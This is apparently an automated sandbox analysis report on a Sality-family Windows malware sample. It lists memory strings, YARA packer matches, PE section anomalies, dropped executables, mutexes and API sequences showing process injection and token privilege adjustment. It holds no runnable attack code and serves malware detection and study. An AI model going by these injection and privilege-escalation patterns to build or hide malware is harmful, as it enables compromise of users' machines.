        Source: StartMenuExperienceHost.exe, 0000001C.00000000.1921378411.00000273D826E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.comx
        Source: SearchApp.exe, 0000001E.00000000.2058947153.000001D61A577000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.office.com/M365.Access
        Source: jvauyc32.exe, 00000012.00000003.2505307561.0000000003DE5000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 00000017.00000003.3084745108.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000017.00000000.1799164284.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://parade.com/61481/toriavey/where-did-hamburgers-originate
        Source: explorer.exe, 00000017.00000003.3086535581.000000000BDC8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000017.00000000.1833219394.000000000BDC8000.00000004.00000001.00020000.00000000.sdmp, StartMenuExperienceHost.exe, 0000001C.00000000.1921378411.00000273D826E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://powerpoint.office.com
        Source: SearchApp.exe, 0000001E.00000000.2105582330.000001D61CC23000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://reactjs.org/docs/error-decoder.html?invariant=
        Source: SearchApp.exe, 0000001E.00000000.2501571404.000001D6307D0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/
        Source: SearchApp.exe, 0000001E.00000000.2105582330.000001D61CC23000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000001E.00000000.2249686813.000001D62E02A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://substrate.office.com
        Source: SearchApp.exe, 0000001E.00000000.2060428257.000001D61A860000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://substrate.office.com/SubstrateSearch-Internal.ReadWrite
        Source: SearchApp.exe, 0000001E.00000000.2219055917.000001D62DDD0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://substrate.office.com/SubstrateSearch-Internal.ReadWriteO
        Source: SearchApp.exe, 0000001E.00000000.2058427040.000001D61A4E3000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://substrate.office.com/search/api1f8c91c6-235c-4050-8639-720df71e4e93d0438cf5-4bd5-480a-aeab-0
        Source: SearchApp.exe, 0000001E.00000000.2310174583.000001D62E0C6000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://substrate.office.comRemovingScopeNarratorText2
        Source: jvauyc32.exe, 00000012.00000003.2505307561.0000000003DE5000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 00000017.00000003.3084745108.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000017.00000000.1799164284.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://upload.wikimedia.org/wikipedia/commons/thumb/8/84/Zealandia-Continent_map_en.svg/1870px-Zeal
        Source: SearchApp.exe, 0000001E.00000000.1983471827.000001CE12200000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.cn/shellRESP
        Source: SearchApp.exe, 0000001E.00000000.1983471827.000001CE12200000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com/shell
        Source: jvauyc32.exe, 00000012.00000003.2505307561.0000000003DE5000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 00000017.00000003.3084745108.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000017.00000000.1799164284.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew
        Source: jvauyc32.exe, 00000012.00000003.2505307561.0000000003DE5000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 00000017.00000003.3084745108.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000017.00000000.1799164284.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew
        Source: explorer.exe, 00000017.00000000.1811548975.000000000899E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000017.00000003.3085615252.000000000899E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://wns.windows.com/bat
        Source: explorer.exe, 00000017.00000003.3086535581.000000000BDC8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000017.00000000.1833219394.000000000BDC8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://word.office.com
        Source: StartMenuExperienceHost.exe, 0000001C.00000000.1921378411.00000273D826E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://word.office.coms
        Source: SearchApp.exe, 0000001E.00000000.2059415264.000001D61A600000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/de-ch/play/games/bowling-hero/cg-9n4v2151rf31
        Source: SearchApp.exe, 0000001E.00000000.2059415264.000001D61A600000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/de-ch/play/games/bricks-breaker-deluxe-crusher/cg-9nnjfbfrzq3j&quot;
        Source: SearchApp.exe, 0000001E.00000000.2059415264.000001D61A600000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/de-ch/play/games/fairyland%3a-merge-%26-magic/cg-9nw8m0c50k4w
        Source: SearchApp.exe, 0000001E.00000000.2059415264.000001D61A600000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/de-ch/play/games/fairyland%3a-merge-%26-magic/cg-9nw8m0c50k4w&quot;
        Source: SearchApp.exe, 0000001E.00000000.2059415264.000001D61A600000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/de-ch/play/games/food-tycoon-frvr/cg-9nf9144n6817
        Source: SearchApp.exe, 0000001E.00000000.2059415264.000001D61A600000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/de-ch/play/games/master-checkers-multiplayer/cg-9p3c5sx31v9k&quot;
        Source: SearchApp.exe, 0000001E.00000000.2059415264.000001D61A600000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/de-ch/play/games/master-chess/cg-9nrl2nj7l6s1
        Source: jvauyc32.exe, 00000012.00000003.2505307561.0000000003DE5000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 00000017.00000003.3084745108.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000017.00000000.1799164284.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/foodanddrink/foodnews/the-best-burger-place-in-phoenix-plus-see-the-rest-o
        Source: jvauyc32.exe, 00000012.00000003.2505307561.0000000003DE5000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 00000017.00000003.3084745108.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000017.00000000.1799164284.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/lifestyle/lifestyle-buzz/what-to-do-if-a-worst-case-nuclear-scenario-actua
        Source: jvauyc32.exe, 00000012.00000003.2505307561.0000000003DE5000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 00000017.00000003.3084745108.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000017.00000000.1799164284.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/companies/kaiser-permanente-and-unions-for-75-000-striking-health-wo
        Source: jvauyc32.exe, 00000012.00000003.2505307561.0000000003DE5000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 00000017.00000003.3084745108.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000017.00000000.1799164284.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/personalfinance/money-matters-changing-institution-of-marriage/ar-AA
        Source: jvauyc32.exe, 00000012.00000003.2505307561.0000000003DE5000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 00000017.00000003.3084745108.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000017.00000000.1799164284.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/personalfinance/the-no-1-phrase-people-who-are-good-at-small-talk-al
        Source: jvauyc32.exe, 00000012.00000003.2505307561.0000000003DE5000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 00000017.00000003.3084745108.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000017.00000000.1799164284.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/crime/bar-fight-leaves-man-in-critical-condition-suspect-arrested-in-
        Source: jvauyc32.exe, 00000012.00000003.2505307561.0000000003DE5000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 00000017.00000003.3084745108.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000017.00000000.1799164284.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/here-s-what-house-rules-say-about-trump-serving-as-speaker-o
        Source: jvauyc32.exe, 00000012.00000003.2505307561.0000000003DE5000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 00000017.00000003.3084745108.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000017.00000000.1799164284.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/how-donald-trump-helped-kari-lake-become-arizona-s-and-ameri
        Source: jvauyc32.exe, 00000012.00000003.2505307561.0000000003DE5000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 00000017.00000003.3084745108.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000017.00000000.1799164284.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/kevin-mccarthy-s-ouster-as-house-speaker-could-cost-gop-its-
        Source: jvauyc32.exe, 00000012.00000003.2505307561.0000000003DE5000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 00000017.00000003.3084745108.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000017.00000000.1799164284.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/trump-whines-to-cameras-in-ny-fraud-case-before-fleeing-to-f
        Source: jvauyc32.exe, 00000012.00000003.2505307561.0000000003DE5000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 00000017.00000003.3084745108.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000017.00000000.1799164284.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/technology/a-federal-emergency-alert-will-be-sent-to-us-phones-nation
        Source: jvauyc32.exe, 00000012.00000003.2505307561.0000000003DE5000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 00000017.00000003.3084745108.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000017.00000000.1799164284.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/technology/prehistoric-comet-impacted-earth-and-triggered-the-switch-
        Source: jvauyc32.exe, 00000012.00000003.2505307561.0000000003DE5000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 00000017.00000003.3084745108.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000017.00000000.1799164284.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/biden-administration-waives-26-federal-laws-to-allow-border-wall-c
        Source: jvauyc32.exe, 00000012.00000003.2505307561.0000000003DE5000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 00000017.00000003.3084745108.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000017.00000000.1799164284.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/dumb-and-dumber-12-states-with-the-absolute-worst-education-in-the
        Source: jvauyc32.exe, 00000012.00000003.2505307561.0000000003DE5000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 00000017.00000003.3084745108.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000017.00000000.1799164284.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/world/a-second-war-could-easily-erupt-in-europe-while-everyone-s-dist
        Source: jvauyc32.exe, 00000012.00000003.2505307561.0000000003DE5000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 00000017.00000003.3084745108.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000017.00000000.1799164284.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/world/england-considers-raising-smoking-age-until-cigarettes-are-bann
        Source: jvauyc32.exe, 00000012.00000003.2505307561.0000000003DE5000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 00000017.00000003.3084745108.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000017.00000000.1799164284.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/world/nobel-prize-in-literature-to-be-announced-in-stockholm/ar-AA1hI
        Source: jvauyc32.exe, 00000012.00000003.2505307561.0000000003DE5000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 00000017.00000003.3084745108.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000017.00000000.1799164284.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/world/ukraine-live-briefing-biden-expresses-worry-about-congressional
        Source: jvauyc32.exe, 00000012.00000003.2505307561.0000000003DE5000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 00000017.00000003.3084745108.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000017.00000000.1799164284.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/accuweather-el-ni
        Source: jvauyc32.exe, 00000012.00000003.2505307561.0000000003DE5000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 00000017.00000003.3084745108.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000017.00000000.1799164284.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/first-map-of-earth-s-lost-continent-has-been-published/
        Source: jvauyc32.exe, 00000012.00000003.2505307561.0000000003DE5000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 00000017.00000003.3084745108.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000017.00000000.1799164284.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/stop-planting-new-forests-scientists-say/ar-AA1hFI09
        Source: SearchApp.exe, 0000001E.00000000.2196185871.000001D62DC47000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/finance?OCID=WSB_TL_FN&PC=wsbmsnqs
        Source: SearchApp.exe, 0000001E.00000000.2196185871.000001D62DC47000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/news?OCID=WSB_QS_NE&PC=wsbmsnqsD
        Source: SearchApp.exe, 0000001E.00000000.2196185871.000001D62DC47000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/sports?OCID=WSB_TL_EL&PC=wsbmsnqs
        Source: SearchApp.exe, 0000001E.00000000.2196185871.000001D62DC47000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/weather?OCID=WSB_QS_WE&PC=wsbmsnqs
        Source: jvauyc32.exe, 00000012.00000003.2505307561.0000000003DE5000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 00000017.00000003.3084745108.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000017.00000000.1799164284.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com:443/en-us/feed
        Source: jvauyc32.exe, 00000012.00000003.2505307561.0000000003DE5000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 00000017.00000003.3084745108.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000017.00000000.1799164284.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.stacker.com/arizona/phoenix
        Source: jvauyc32.exe, 00000012.00000003.2505307561.0000000003DE5000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 00000017.00000003.3084745108.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000017.00000000.1799164284.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.starsinsider.com/n/154870?utm_source=msn.com&utm_medium=display&utm_campaign=referral_de
        Source: jvauyc32.exe, 00000012.00000003.2505307561.0000000003DE5000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 00000017.00000003.3084745108.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000017.00000000.1799164284.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.yelp.com
        Source: svchost.exe, 00000014.00000002.4042487399.000001697A6A9000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000014.00000000.1740927519.000001697A6A9000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000001E.00000000.2059510664.000001D61A642000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://xsts.auth.xboxlive.com
        Source: svchost.exe, 00000014.00000002.4042487399.000001697A6A9000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000014.00000000.1740927519.000001697A6A9000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://xsts.auth.xboxlive.com/
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeCode function: 18_2_00409018 GdiplusStartup,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,CreateCompatibleDC,GetDC,GetDC,CreateCompatibleBitmap,SelectObject,GetDC,BitBlt,DeleteObject,GdiplusShutdown,18_2_00409018

        System Summary

        barindex
        Malicious sample detected (through community Yara rule)
        Source: 1.2.SecuriteInfo.com.Win32.Sector.30.15961.3704.exe.1400c1c.6.unpack, type: UNPACKEDPEMatched rule: Detects executables packed with Sality Polymorphic Code Generator or Simple Poly Engine or Sality Author: ditekSHen
        Source: 1.2.SecuriteInfo.com.Win32.Sector.30.15961.3704.exe.1410000.10.unpack, type: UNPACKEDPEMatched rule: Detects executables packed with Sality Polymorphic Code Generator or Simple Poly Engine or Sality Author: ditekSHen
        Source: 1.2.SecuriteInfo.com.Win32.Sector.30.15961.3704.exe.1430cc4.9.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables packed with Sality Polymorphic Code Generator or Simple Poly Engine or Sality Author: ditekSHen
        PE file contains section with special chars
        Source: SecuriteInfo.com.Win32.Sector.30.15961.3704.exeStatic PE information: section name:
        Source: SecuriteInfo.com.Win32.Sector.30.15961.3704.exeStatic PE information: section name:
        Source: SecuriteInfo.com.Win32.Sector.30.15961.3704.exeStatic PE information: section name:
        Source: SecuriteInfo.com.Win32.Sector.30.15961.3704.exeStatic PE information: section name:
        Source: jvauyc32.exe.1.drStatic PE information: section name:
        Source: jvauyc32.exe.1.drStatic PE information: section name:
        Source: jvauyc32.exe.1.drStatic PE information: section name:
        Source: jvauyc32.exe.1.drStatic PE information: section name:
        PE file has a writeable .text section
        Source: winfpnht.exe.1.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_LOCKED, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
        Source: winmxfy.exe.1.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_LOCKED, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
        Source: voiv.exe.1.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_LOCKED, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
        Source: rckc.exe.10.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_LOCKED, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
        Source: winkvnav.exe.10.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_LOCKED, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeProcess Stats: CPU usage > 49%
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Sector.30.15961.3704.exeFile created: C:\Windows\66b8c0Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeFile created: C:\Windows\726f78Jump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Sector.30.15961.3704.exeFile deleted: C:\Windows\66b8c0Jump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Sector.30.15961.3704.exeCode function: 1_2_00AB61111_2_00AB6111
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Sector.30.15961.3704.exeCode function: 1_2_0143E3291_2_0143E329
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Sector.30.15961.3704.exeCode function: 1_2_0143B6141_2_0143B614
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Sector.30.15961.3704.exeCode function: 1_2_01446CD01_2_01446CD0
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeCode function: 10_2_0097611110_2_00976111
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeCode function: 10_2_00A0000010_2_00A00000
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeCode function: 10_2_00A2000010_2_00A20000
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeCode function: 10_2_00A4000010_2_00A40000
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeCode function: 10_2_00BA000010_2_00BA0000
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeCode function: 18_2_00403BFD18_2_00403BFD
        Source: Joe Sandbox ViewDropped File: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe F2DE2A37E6DFC90FFD0162EF11A7C9792850E37767B1E2C5AD28C751D18D750F
        Source: msedge.exe.10.drStatic PE information: Number of sections : 14 > 10
        Source: SecuriteInfo.com.Win32.Sector.30.15961.3704.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
        Source: 1.2.SecuriteInfo.com.Win32.Sector.30.15961.3704.exe.1400c1c.6.unpack, type: UNPACKEDPEMatched rule: INDICATOR_EXE_Packed_SimplePolyEngine author = ditekSHen, description = Detects executables packed with Sality Polymorphic Code Generator or Simple Poly Engine or Sality
        Source: 1.2.SecuriteInfo.com.Win32.Sector.30.15961.3704.exe.1410000.10.unpack, type: UNPACKEDPEMatched rule: INDICATOR_EXE_Packed_SimplePolyEngine author = ditekSHen, description = Detects executables packed with Sality Polymorphic Code Generator or Simple Poly Engine or Sality
        Source: 1.2.SecuriteInfo.com.Win32.Sector.30.15961.3704.exe.1430cc4.9.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_EXE_Packed_SimplePolyEngine author = ditekSHen, description = Detects executables packed with Sality Polymorphic Code Generator or Simple Poly Engine or Sality
        Source: winfpnht.exe.1.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_LOCKED, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
        Source: winmxfy.exe.1.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_LOCKED, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
        Source: voiv.exe.1.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_LOCKED, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
        Source: rckc.exe.10.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_LOCKED, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
        Source: winkvnav.exe.10.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_LOCKED, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
        Source: rckc.exe.10.drStatic PE information: Section .text
        Source: winfpnht.exe.1.drStatic PE information: Section .text
        Source: winkvnav.exe.10.drStatic PE information: Section .text
        Source: voiv.exe.1.drStatic PE information: Section .text
        Source: winmxfy.exe.1.drStatic PE information: Section .text
        Source: SecuriteInfo.com.Win32.Sector.30.15961.3704.exeStatic PE information: Section: ZLIB complexity 1.0010673394139336
        Source: SecuriteInfo.com.Win32.Sector.30.15961.3704.exeStatic PE information: Section: ZLIB complexity 1.0381944444444444
        Source: SecuriteInfo.com.Win32.Sector.30.15961.3704.exeStatic PE information: Section: ZLIB complexity 0.9934809602649006
        Source: SecuriteInfo.com.Win32.Sector.30.15961.3704.exeStatic PE information: Section: ZLIB complexity 1.0497737556561086
        Source: jvauyc32.exe.1.drStatic PE information: Section: ZLIB complexity 1.0010673394139336
        Source: jvauyc32.exe.1.drStatic PE information: Section: ZLIB complexity 1.0381944444444444
        Source: jvauyc32.exe.1.drStatic PE information: Section: ZLIB complexity 0.9934809602649006
        Source: jvauyc32.exe.1.drStatic PE information: Section: ZLIB complexity 1.0497737556561086
        Source: classification engineClassification label: mal100.spre.phis.troj.evad.winEXE@17/49@220/100
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Sector.30.15961.3704.exeCode function: 1_2_01441EF6 OpenProcess,GetLastError,GetVersionExA,GetCurrentThread,OpenThreadToken,GetLastError,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,GetLastError,CloseHandle,OpenProcess,AdjustTokenPrivileges,CloseHandle,OpenProcessToken,GetTokenInformation,GetLastError,GetProcessHeap,RtlAllocateHeap,GetTokenInformation,LookupAccountSidA,lstrcmpiA,lstrcmpiA,lstrcmpiA,CreateMutexA,VirtualAllocEx,WriteProcessMemory,CreateRemoteThread,VirtualAllocEx,lstrlen,WriteProcessMemory,CreateRemoteThread,CloseHandle,CloseHandle,GetProcessHeap,HeapFree,1_2_01441EF6
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeCode function: 18_2_004074BF LookupPrivilegeValueW,AdjustTokenPrivileges,18_2_004074BF
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Sector.30.15961.3704.exeCode function: 1_2_00AB58EB CreateToolhelp32Snapshot,Module32FirstW,1_2_00AB58EB
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeCode function: 18_2_00407B22 wcscpy,CoInitializeEx,CoInitializeSecurity,CoCreateInstance,SysAllocString,SysAllocString,SysFreeString,SysFreeString,CoSetProxyBlanket,SysAllocString,SysAllocString,SysFreeString,SysFreeString,wcscpy,VariantClear,wcscpy,wcscpy,CoUninitialize,18_2_00407B22
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Sector.30.15961.3704.exeFile created: C:\Users\user\AppData\Roaming\Z0BAZwxxJump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMutant created: \Sessions\1\BaseNamedObjects\explorer.exeM_3504_
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMutant created: \Sessions\1\BaseNamedObjects\sedsmibsjdoiad.exeM_3964_
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_2584_
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMutant created: \Sessions\1\BaseNamedObjects\csrss.exeM_412_
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMutant created: \Sessions\1\BaseNamedObjects\wmiprvse.exeM_5904_
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMutant created: \Sessions\1\BaseNamedObjects\sedsmibsjdoiad.exeM_6876_
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMutant created: \Sessions\1\BaseNamedObjects\dllhost.exeM_5040_
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_3836_
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_4060_
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_1916_
